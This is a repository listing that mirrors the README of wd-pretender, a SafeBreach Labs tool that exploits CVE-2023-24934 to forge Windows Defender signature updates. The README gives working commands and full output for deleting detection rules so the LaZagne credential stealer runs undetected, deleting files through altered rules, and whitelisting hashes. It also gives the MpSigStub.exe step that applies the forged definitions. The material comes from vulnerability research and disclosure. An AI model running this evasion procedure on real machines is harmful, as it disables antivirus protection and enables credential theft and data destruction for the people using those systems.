https://github.com/safebreach-labs/wd-pretender

https://github.com/safebreach-labs/wd-pretender

Last synced: 13 days ago
JSON representation

• Host: GitHub
• URL: https://github.com/safebreach-labs/wd-pretender
• Owner: SafeBreach-Labs
• License: bsd-3-clause
• Created: 2023-02-12T09:43:17.000Z (about 2 years ago)
• Default Branch: main
• Last Pushed: 2023-08-09T11:30:04.000Z (over 1 year ago)
• Last Synced: 2025-03-28T18:54:46.021Z (about 1 month ago)
• Language: Python
• Size: 107 KB
• Stars: 127
• Watchers: 8
• Forks: 11
• Open Issues: 1
• Metadata Files:
  • Readme: README.md
  • License: LICENSE

Awesome Lists containing this project

README

        
# wd-pretender

## TL;DR

Compatible with Windows Defender platform version 4.18.2302.7 and earlier.

## Description

wd-pretender is a powerful tool designed to simulate a Windows Defender update using the [CVE-2023-24934](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24934) vulnerability. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization. 

## Features

- Bypass EDR Rules: Bypass certain Windows Defender security measures and remain undetected.

## Installation 

Windows with Python 3.10+ with the libraries mentioned in the file `requirements.txt`

## Usage

```

-- Defender-Pretender: v1.0.0 (SafeBreach Labs) --

[+] Getting Signatures Location ...

usage: wd-pretender.py command [options]

Windows Defender Update

positional arguments:

  {bypass,delete,friendly}

    bypass              bypass windows defender rules by threat name

    delete              delete file by modifying rules

    friendly            add hash to friendly files threat

optional arguments:

  -h, --help            show this help message and exit

  -o OUTPUT             output folder for the exported vdm files

  -d DEFINITIONS_PATH   set explicit definitions path

```

### Bypass

```

        -- Defender-Pretender: v1.0.0 (SafeBreach Labs) --

[+] Getting Signatures Location ...

usage: wd-pretender.py command [options] bypass [-h] threat_name

positional arguments:

  threat_name  delete all threats matching 

```

For example we want to bypass LaZagne rules and be able to execute LaZagne without been detected by Windows Defender.

```

python wd-pretender.py -o C:\BypassDefs bypass lazagne

```

Output:

```

python .\wd-pretender.py -o C:\Definitions bypass lazagne

        -- Defender-Pretender: v1.0.0 (SafeBreach Labs) --

[+] Getting Signatures Location ...

[+] Definitions Path: C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{5235DDA9-EDFD-456F-A39A-88CF98DA5B71}

[+] Loading mpasbase.vdm

[+] Loading mpasdlta.vdm

[+] Loading mpavbase.vdm

[+] Loading mpavdlta.vdm

[+] Enumerating Anti-Virus Definitions

[+] Threats Containing: lazagne

        Deleting => b'\xd8!LaZagne'

        Deleting => b'HackTool:Python/LaZagne'

        Deleting => b'HackTool:Python/LaZagne.A!MTB'

        Deleting => b'\xd8!LaZagne!ml'

        Deleting => b'HackTool:Python/LaZagne.D!MTB'

        Deleting => b'\xcc!Golazagne.A!MTB'

        Deleting => b'HackTool:Python/LaZagne.B'

        Deleting => b'\xd8!LaZagne!sms'

        Deleting => b'\xcc!Lazagne.A!MTB'

        Deleting => b'\xcc\xe1Lazagne'

[+] Enumerating Anti-Spyware Definitions

[+] Threats Containing: lazagne

[+] Exporting Definitions into: C:\Definitions

[+] mpasdlta.vdm: 1.391.491.0 => 1.391.492.0

[+] mpavdlta.vdm: 1.391.491.0 => 1.391.492.0

[+] Done!

```

The output displays the deleted threat rules recorded by the tool, indicating the removal of 10 threats from the Anti-Virus definitions. The newly updated definitions have been exported to the user-supplied export path located at C:\BypassDefs.

To proceed, ensure that MpSigStub.exe is copied to the BypassDefs folder. Following that, execute the following command:

```

MpSigStub.exe /stub 1.1.18500.10 /payload 

```

The export log generated by wd-pretender confirms the presence of the updated definitions with the version indicated as .

To verify the successful update, please refer to the "MpSigStub.log" file located in the Temp folder of the user with whom the execution took place. For instance, if the tool was executed with administrator privileges (although it is not a requirement), the log file can be found at C:\Windows\Temp.

## License

wd-pretender is released under the BSD 3-Clause License. 

Feel free to modify and distribute this tool responsibly, while adhering to the license terms.